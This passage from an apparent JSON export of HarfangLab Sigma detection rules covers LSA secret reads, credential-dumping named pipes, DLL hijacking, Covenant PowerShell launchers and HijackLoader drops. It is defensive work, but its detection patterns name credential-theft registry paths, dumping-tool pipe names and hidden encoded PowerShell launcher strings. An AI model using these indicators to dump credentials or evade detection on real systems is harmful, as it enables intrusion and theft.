https://www.nirsoft.net/utils/lsa_secrets_dump.html\n - https://github.com/laxa/SharpSecretsdump/\n - https://attack.mitre.org/software/S0008/\n - https://attack.mitre.org/techniques/T1003\ndate: 2024/06/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.002\n - attack.t1003.004\n - attack.t1003.005\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: ReadValue\n TargetObject|contains:\n - 'SECURITY\\Policy\\Secrets\\\\*\\CurrVal' # NLKM Key\n - 'SECURITY\\Policy\\Secrets\\\\*\\OldVal' # Backup\n - 'SECURITY\\Policy\\PolEKList' # List of encrypted keys used by LSA\n Image|contains: '?'\n\n filter_lsass:\n Image:\n - 
'?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_defender:\n ProcessGrandparentImage: '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n ProcessCommandLine|contains:\n - ':\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe ExecutionPolicy Bypass -NoProfile -NonInteractive -Command'\n - ':\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\PSScript_'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f7eb64b2-21b0-493f-8043-540bcb5ff18c",
"rule_name": "LSA Secrets Read from Registry",
"rule_description": "Detects sensitive values in relation to the Local Security Authority (LSA) being read.\nThe LSA is a component of Microsoft Windows responsible for enforcing security policies, handling authentications, and managing process privileges.\nDue to its functions, the LSA contains a variety of different credential materials, making it a common target for attackers looking to lateralize or escalate their privileges.\nSince some LSA secrets are stored in the Windows registry, many security tools such as the Impacket suite, gsecdump or SharpSecretsdump implement components reading these values either locally or through Remote Registry Services to extract valuable information.\nThis rule monitors the values associated with the current and backup secrets, such as the NL$KM key, used to encrypt cached credentials.\nIt is recommended to determine if the process accessing these values has a legitimate reason to do so.\n",
"rule_creation_date": "2024-06-04",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.004",
"attack.t1003.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f86d2a63-b9d6-453e-a211-26ff34ee6cce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296673Z",
"creation_date": "2026-03-23T11:45:35.296675Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296680Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Cscript/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md#atomic-test-2---ostap-payload-download",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_suspicious_script_execution_engine_parameter.yml",
"content": "title: Suspicious Script Execution with Specified Engine Parameter\nid: f86d2a63-b9d6-453e-a211-26ff34ee6cce\ndescription: |\n Detects the suspicious execution of a Windows script engine with a parameter specifying the language to use.\n This technique has been used by attackers to execute files with misleading extensions. For instance, it was used by the OSTAP JScript downloader to execute malicious code from Office macro.\n It is recommended to investigate the parent process performing this action, the action performed by the child process and to analyze the script file itself to look for malicious content.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Cscript/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md#atomic-test-2---ostap-payload-download\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/12/05\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059.005\n - attack.t1059.007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.WScript\n - classification.Windows.LOLBin.CScript\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n OriginalFileName|endswith:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains:\n - '/e:'\n - '-e:'\n ParentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n GrandparentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n filter_cmd:\n ParentCommandLine|startswith:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\'\n - 
'?:\\WINDOWS\\SysWOW64\\cmd.exe /c ?:\\'\n\n selection_cmd:\n ParentCommandLine|contains:\n - '\\cmd.exe /c ?:\\windows\\'\n - '\\cmd.exe /c ?:\\ProgramData\\'\n - '\\cmd.exe /c ?:\\PerfLogs\\'\n - '\\cmd.exe /c ?:\\temp\\'\n - '\\cmd.exe /c ?:\\users\\'\n - '\\cmd.exe /c ?:\\Program Files (x86)\\'\n - '\\cmd.exe /c ?:\\Program Files\\'\n - '\\cmd.exe /c ?:\\\\?Recycle.Bin\\'\n\n exclusion_commandline:\n CommandLine|contains:\n - ' ?:\\users\\\\*\\AppData\\Roaming\\\\\\\\svchost\\FTJmqGbe.tmp' # http://www.global-imaging.net/solutions.htm\n - 'cscript //E:JScript //nologo ?:\\Users\\\\*\\\\* ScoreGym*\\ScoreGym\\update\\tools\\base64.bat'\n - '?:\\windows\\temp\\psappdeploytoolkit\\'\n - '?:\\WINDOWS\\SystemTemp\\PSAppDeployToolkit\\'\n - '\\PSAppDeployToolkit\\ExecuteAsUser\\PSAppDeployToolkit-ExecuteAsUser.vbs'\n - 'cscript.exe //e:vbscript *\\TSS\\psSDP\\Diag\\global\\Autoruns.vbs ' # https://learn.microsoft.com/en-us/troubleshoot/windows-client/windows-tss/introduction-to-troubleshootingscript-toolset-tss\n - 'cscript.exe //B //Nologo //E:vbs ?:\\Program Files\\'\n - 'cscript.exe //B //Nologo //E:vbs ?:\\Program Files (x86)\\'\n - 'WScript.exe /E:vbs ?:\\ProgramData\\Thinstall\\UnRegister\\'\n - 'cscript //E:JScript //nologo ?:\\Users\\\\*\\Desktop\\'\n\n exclusion_parentimage:\n ParentImage: '?:\\Windows\\System32\\spoolsv.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files (x86)\\Tanium\\Tanium Client\\TaniumClient.exe'\n - '?:\\Program Files (x86)\\Meraki\\PCC Agent *\\m_agent_service.exe'\n - '?:\\Program Files\\Meraki\\PCC Agent *\\m_agent_service.exe'\n\n exclusion_amd:\n CommandLine|endswith: '//e:vbscript //B //NOLOGO'\n ParentImage|endswith:\n - '\\AMD_Chipset_Software.exe'\n - '\\AMD_Chipset_Drivers.exe'\n\n # https://github.com/JohnWhy/Anti-AFK-Batch-File/blob/master/afker.bat\n exclusion_afker:\n CommandLine:\n - 'CScript //nologo //E:JScript *\\afker.bat {NUMLOCK}'\n - 'CScript //nologo //E:JScript *\\av.bat {NUMLOCK}'\n\n 
condition: selection_image and (not filter_cmd or selection_cmd) and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f86d2a63-b9d6-453e-a211-26ff34ee6cce",
"rule_name": "Suspicious Script Execution with Specified Engine Parameter",
"rule_description": "Detects the suspicious execution of a Windows script engine with a parameter specifying the language to use.\nThis technique has been used by attackers to execute files with misleading extensions. For instance, it was used by the OSTAP JScript downloader to execute malicious code from an Office macro.\nIt is recommended to investigate the parent process performing this action, the action performed by the child process and to analyze the script file itself to look for malicious content.\n",
"rule_creation_date": "2023-12-05",
"rule_modified_date": "2026-02-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1059.007",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f87fa54f-f27d-4a98-8d96-b6eadfb2453e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074756Z",
"creation_date": "2026-03-23T11:45:34.074758Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074763Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_credential_dumping_named_pipes_creation.yml",
"content": "title: Named Pipe Created Associated with Credential Dumping Tools\nid: f87fa54f-f27d-4a98-8d96-b6eadfb2453e\ndescription: |\n Detects a suspicious attempt to dump credentials in Windows using tools that create named pipes.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the process responsible for the creation of the named pipe and to look for other suspicious activities on the host.\nreferences:\n - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/07/11\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName|contains:\n - '\\lsadump'\n - '\\cachedump'\n - '\\wceservicepipe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f87fa54f-f27d-4a98-8d96-b6eadfb2453e",
"rule_name": "Named Pipe Created Associated with Credential Dumping Tools",
"rule_description": "Detects a suspicious attempt to dump credentials in Windows using tools that create named pipes.\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the process responsible for the creation of the named pipe and to look for other suspicious activities on the host.\n",
"rule_creation_date": "2022-07-11",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f8d10e3f-c21e-4c10-aa29-c702118c7fdf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096060Z",
"creation_date": "2026-03-23T11:45:34.096063Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096068Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md#atomic-test-1---dll-search-order-hijacking---amsidll",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_powershell.yml",
"content": "title: DLL Hijacking via PowerShell.exe\nid: f8d10e3f-c21e-4c10-aa29-c702118c7fdf\ndescription: |\n Detects potential Windows DLL Hijacking via PowerShell.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md#atomic-test-1---dll-search-order-hijacking---amsidll\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'PowerShell.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\davclnt.dll'\n - '\\drprov.dll'\n - '\\ntlanman.dll'\n - '\\p9np.dll'\n - '\\propsys.dll'\n - '\\rsaenh.dll'\n - '\\windows.storage.dll'\n - '\\amsi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n condition: selection and not 1 of filter_*\n 
filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f8d10e3f-c21e-4c10-aa29-c702118c7fdf",
"rule_name": "DLL Hijacking via PowerShell.exe",
"rule_description": "Detects potential Windows DLL Hijacking via PowerShell.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f962a0cd-a955-4f9d-b311-f8b24582526d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609268Z",
"creation_date": "2026-03-23T11:45:34.609272Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609279Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cobbr/Covenant",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_covenant_powershell_launcher.yml",
"content": "title: Covenant PowerShell Launcher Detected\nid: f962a0cd-a955-4f9d-b311-f8b24582526d\ndescription: |\n Detects execution of Covenant PowerShell Launcher.\n Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\n It is recommended to investigate the parent process for suspicious activities as well as to look for suspicious actions stemming from the PowerShell host process.\nreferences:\n - https://github.com/cobbr/Covenant\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/11/10\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - attack.command_and_control\n - attack.t1071\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Framework.Covenant\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection_1:\n PowershellCommand|contains:\n - ' -Sta -Nop -Window Hidden -Command '\n - ' -Sta -Nop -Window Hidden -EncodedCommand '\n selection_2:\n PowershellCommand|contains:\n - 'sv o (New-Object IO.MemoryStream);'\n - 'cwB2ACAAbwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACkAOwB'\n\n exclusion_gehealthcare:\n PowershellScriptPath:\n - '?:\\Program Files\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\PrivateMethods.ps1'\n - '?:\\Program Files (x86)\\GE Healthcare\\Solution Deployer Framework\\Modules\\Utility\\PrivateMethods.ps1'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f962a0cd-a955-4f9d-b311-f8b24582526d",
"rule_name": "Covenant PowerShell Launcher Detected",
"rule_description": "Detects execution of Covenant PowerShell Launcher.\nCovenant is a .NET command and control framework that aims to highlight the attack surface of .NET.\nIt is recommended to investigate the parent process for suspicious activities as well as to look for suspicious actions stemming from the PowerShell host process.\n",
"rule_creation_date": "2021-11-10",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1071"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f96e0d60-4942-4628-b92c-7c662578aa9b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604401Z",
"creation_date": "2026-03-23T11:45:34.604404Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604411Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/012/",
"https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader",
"https://www.crowdstrike.com/blog/hijackloader-expands-techniques/"
],
"name": "t1055_012_suspicious_file_dropped_hijackloader.yml",
"content": "title: HijackLoader Dropped File\nid: f96e0d60-4942-4628-b92c-7c662578aa9b\ndescription: |\n Detects the creation of StrCmp.exe in the AppData folder.\n HijackLoader creates and executes StrCmp.exe in the AppData folder for process hollowing purposes.\n HijackLoader is a defense evasion oriented loader relying mostly on DLL sideloading and a custom variant of process hollowing.\n It usually drops stealers as final payloads.\n It is recommended to analyze the process responsible for writing the StrCmp file to disk to determine its legitimacy and to look for other suspicious actions on the host.\nreferences:\n - https://attack.mitre.org/techniques/T1055/012/\n - https://www.zscaler.com/blogs/security-research/technical-analysis-hijackloader\n - https://www.crowdstrike.com/blog/hijackloader-expands-techniques/\ndate: 2024/09/16\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055.012\n - classification.Windows.Source.Filesystem\n - classification.Windows.Loader.HijackLoader\n - classification.Windows.Behavior.ProcessTampering\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Roaming\\\\*\\StrCmp.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f96e0d60-4942-4628-b92c-7c662578aa9b",
"rule_name": "HijackLoader Dropped File",
"rule_description": "Detects the creation of StrCmp.exe in the AppData folder.\nHijackLoader creates and executes StrCmp.exe in the AppData folder for process hollowing purposes.\nHijackLoader is a defense evasion oriented loader relying mostly on DLL sideloading and a custom variant of process hollowing.\nIt usually drops stealers as final payloads.\nIt is recommended to analyze the process responsible for writing the StrCmp file to disk to determine its legitimacy and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2024-09-16",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f9798db9-3af5-4b00-9a78-5a7bf8d90ed1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077851Z",
"creation_date": "2026-03-23T11:45:34.077853Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077857Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_expand.yml",
"content": "title: DLL Hijacking via expand.exe\nid: f9798db9-3af5-4b00-9a78-5a7bf8d90ed1\ndescription: |\n Detects potential Windows DLL Hijacking via expand.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'expand.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\Cabinet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f9798db9-3af5-4b00-9a78-5a7bf8d90ed1",
"rule_name": "DLL Hijacking via expand.exe",
"rule_description": "Detects potential Windows DLL Hijacking via expand.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "f99772ac-fdaa-4cf6-9c2b-59afab8387e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098334Z",
"creation_date": "2026-03-23T11:45:34.098336Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098341Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_pnpunattend.yml",
